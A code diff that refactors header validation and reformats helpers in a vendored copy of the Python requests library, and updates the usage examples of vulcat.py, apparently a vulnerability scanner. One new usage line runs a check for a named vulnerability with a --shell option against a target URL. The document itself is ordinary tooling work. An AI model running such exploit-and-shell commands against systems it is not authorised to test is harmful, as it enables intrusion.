+    return urlunparse((scheme, netloc, path, "", query, fragment))
 
 
 def get_auth_from_url(url):
@@ -950,35 +1019,36 @@ def get_auth_from_url(url):
     try:
         auth = (unquote(parsed.username), unquote(parsed.password))
     except (AttributeError, TypeError):
-        auth = ('', '')
+        auth = ("", "")
 
     return auth
 
 
-# Moved outside of function to avoid recompile every call
-_CLEAN_HEADER_REGEX_BYTE = re.compile(b'^\\S[^\\r\\n]*$|^$')
-_CLEAN_HEADER_REGEX_STR = re.compile(r'^\S[^\r\n]*$|^$')
-
-
 def check_header_validity(header):
-    """Verifies that header value is a string which doesn't contain
-    leading whitespace or return characters. This prevents unintended
-    header injection.
+    """Verifies that header parts don't contain leading whitespace
+    reserved characters, or return characters.
 
     :param header: tuple, in the format (name, value).
     """
     name, value = header
 
-    if isinstance(value, bytes):
-        pat = _CLEAN_HEADER_REGEX_BYTE
-    else:
-        pat = _CLEAN_HEADER_REGEX_STR
-    try:
-        if not pat.match(value):
-            raise InvalidHeader("Invalid return character or leading space in header: %s" % name)
-    except TypeError:
-        raise InvalidHeader("Value for header {%s: %s} must be of type str or "
-                            "bytes, not %s" % (name, value, type(value)))
+    for part in header:
+        if type(part) not in HEADER_VALIDATORS:
+            raise InvalidHeader(
+                f"Header part ({part!r}) from {{{name!r}: {value!r}}} must be "
+                f"of type str or bytes, not {type(part)}"
+            )
+
+    _validate_header_part(name, "name", HEADER_VALIDATORS[type(name)][0])
+    _validate_header_part(value, "value", HEADER_VALIDATORS[type(value)][1])
+
+
+def _validate_header_part(header_part, header_kind, validator):
+    if not validator.match(header_part):
+        raise InvalidHeader(
+            f"Invalid leading whitespace, reserved character(s), or return"
+            f"character(s) in header {header_kind}: {header_part!r}"
+        )
 
 
 def urldefragauth(url):
@@ -993,21 +1063,24 @@ def urldefragauth(url):
     if not netloc:
         netloc, path = path, netloc
 
-    netloc = netloc.rsplit('@', 1)[-1]
+    netloc = netloc.rsplit("@", 1)[-1]
 
-    return urlunparse((scheme, netloc, path, params, query, ''))
+    return urlunparse((scheme, netloc, path, params, query, ""))
 
 
 def rewind_body(prepared_request):
     """Move file pointer back to its recorded starting position
     so it can be read again on redirect.
     """
-    body_seek = getattr(prepared_request.body, 'seek', None)
-    if body_seek is not None and isinstance(prepared_request._body_position, integer_types):
+    body_seek = getattr(prepared_request.body, "seek", None)
+    if body_seek is not None and isinstance(
+        prepared_request._body_position, integer_types
+    ):
         try:
             body_seek(prepared_request._body_position)
-        except (IOError, OSError):
-            raise UnrewindableBodyError("An error occurred when rewinding request "
-                                        "body for redirect.")
+        except OSError:
+            raise UnrewindableBodyError(
+                "An error occurred when rewinding request body for redirect."
+            )
     else:
         raise UnrewindableBodyError("Unable to rewind request body for redirect.")
diff --git a/vulcat.py b/vulcat.py
index 09b4d13..88e1199 100644
--- a/vulcat.py
+++ b/vulcat.py
@@ -20,10 +20,11 @@
     else:
         print('''Please specify parameters, example:
     python3 vulcat.py -h
-    python3 vulcat.py -u http://www.example.com/
-    python3 vulcat.py -f url.txt
     python3 vulcat.py --list
-    python3 vulcat.py --version
+    python3 vulcat.py -u https://www.example.com/
+    python3 vulcat.py -f url.txt -o html
+    python3 vulcat.py -u https://www.example.com/ -v httpd --log 3
+    python3 vulcat.py -u https://www.example.com/ -v cnvd-2018-24942 --shell
 ''')
 except KeyboardInterrupt:
     print(color.reset('CTRL + C exit the scan'))